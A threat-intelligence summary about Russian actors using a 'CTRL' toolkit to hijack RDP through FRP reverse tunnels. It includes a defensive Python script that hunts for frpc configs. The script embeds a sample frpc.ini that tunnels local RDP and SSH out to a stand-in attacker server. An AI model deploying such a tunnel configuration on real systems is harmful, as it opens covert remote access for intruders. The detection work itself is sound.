
Russian Hackers Use CTRL Toolkit for RDP Hijacking via FRP Tunnels

Severity: High (Score: 69.5)

Sources: Gbhackers, Thehackernews

Summary

Russian hackers have deployed a new remote access toolkit named 'CTRL' to hijack Remote Desktop Protocol (RDP) sessions on compromised Windows systems. The toolkit reaches those systems through FRP-based reverse tunnels: the FRP client on the victim opens an outbound connection to an attacker-controlled FRP server, and RDP connections made to that server are relayed back down the same tunnel to the victim's local RDP port, so no new inbound listener or firewall exception appears on the host. CTRL bundles credential theft, keylogging and RDP exploitation into a single post-exploitation framework. At the time of reporting it was still undetected by many public malware scanners, and its quiet operation lets attackers keep hands-on access without raising alarms. Organizations that rely on RDP should be particularly vigilant. The situation is ongoing, and no specific mitigation strategies had been reported at the time of writing.

Key Points:

  • Russian hackers are using a new toolkit called 'CTRL' for RDP hijacking.
  • The toolkit employs FRP-based reverse tunnels for stealthy access to Windows systems.
  • Many public malware scanners do not yet detect the CTRL toolkit, which raises its threat level.
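The reporting only says the tunnels are "FRP-based", so one practical hunt is to look for FRP client configurations that expose the local RDP port. The example below is added here and is not code from the reporting or from the CTRL toolkit; it assumes the actor drops a stock frpc INI config (the format documented by the open-source frp project), and the sample config, its section names and the server address 203.0.113.10 are constructed for illustration.

```python
"""Hunt for frpc (fast reverse proxy client) configs that expose RDP.

Added example; not code from the reporting or from the CTRL toolkit.
Assumes a stock frpc INI config. The sample below is constructed.
"""
import configparser
import io

# Constructed sample of what an frpc.ini that tunnels RDP looks like.
# The control channel goes OUTBOUND to server_addr:server_port, so no new
# listener appears on the victim; RDP is reached via remote_port on the
# attacker's FRP server, which relays it down the tunnel to local_port.
SAMPLE_FRPC_INI = """
[common]
server_addr = 203.0.113.10
server_port = 7000
token = changeme

[rdp]
type = tcp
local_ip = 127.0.0.1
local_port = 3389
remote_port = 6000

[ssh]
type = tcp
local_ip = 127.0.0.1
local_port = 22
remote_port = 6022
"""

# Local ports whose exposure through a reverse tunnel means remote admin
# access (T1021 Remote Services) rather than, say, a web demo.
RISKY_LOCAL_PORTS = {3389: "RDP", 5985: "WinRM", 5986: "WinRM-TLS", 445: "SMB"}

# frp proxy types that carry raw TCP (and therefore RDP) end to end.
TCP_LIKE_TYPES = {"tcp", "stcp", "sudp", "xtcp"}


def parse_frpc_ini(text):
    """Parse an frpc INI config into ((server_addr, server_port), [proxies]).

    Every section other than [common] is one proxy definition.
    """
    cp = configparser.ConfigParser(interpolation=None)
    cp.read_file(io.StringIO(text))
    common = cp["common"] if cp.has_section("common") else {}
    server = (common.get("server_addr", ""), int(common.get("server_port", 7000)))
    proxies = []
    for name in cp.sections():
        if name == "common":
            continue
        sec = cp[name]
        proxies.append({
            "name": name,
            "type": sec.get("type", "tcp"),
            "local_ip": sec.get("local_ip", "127.0.0.1"),
            "local_port": int(sec.get("local_port", 0)),
            "remote_port": int(sec.get("remote_port", 0)),
        })
    return server, proxies


def find_exposed_services(text):
    """Return the proxies that expose a remote-access port via the tunnel."""
    server, proxies = parse_frpc_ini(text)
    findings = []
    for p in proxies:
        service = RISKY_LOCAL_PORTS.get(p["local_port"])
        if service and p["type"] in TCP_LIKE_TYPES:
            findings.append({**p, "service": service, "server": server})
    return findings


if __name__ == "__main__":
    for f in find_exposed_services(SAMPLE_FRPC_INI):
        print(f"[{f['name']}] {f['service']} on {f['local_ip']}:{f['local_port']} "
              f"is reachable as {f['server'][0]}:{f['remote_port']} "
              f"(control channel -> {f['server'][0]}:{f['server'][1]})")
```

Run this against any `.ini` found next to an unexpected `frpc` binary (or any INI whose `[common]` section has `server_addr`); the `server_addr`/`server_port` pair it returns is also the outbound destination to look for in proxy and firewall logs, since that connection is the only network footprint the tunnel leaves on the host. Newer frpc releases use a TOML config with `[[proxies]]` tables and `localPort`/`remotePort` keys; the same check (a TCP-type proxy whose local port is 3389) applies there.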

Key Entities

  • Malware (attack_type)
  • T1003 - OS Credential Dumping (mitre_attack)
  • T1021 - Remote Services (mitre_attack)
  • T1056 - Input Capture (mitre_attack)
  • Windows (platform)
  • CTRL (tool)
  • CTRL Toolkit (tool)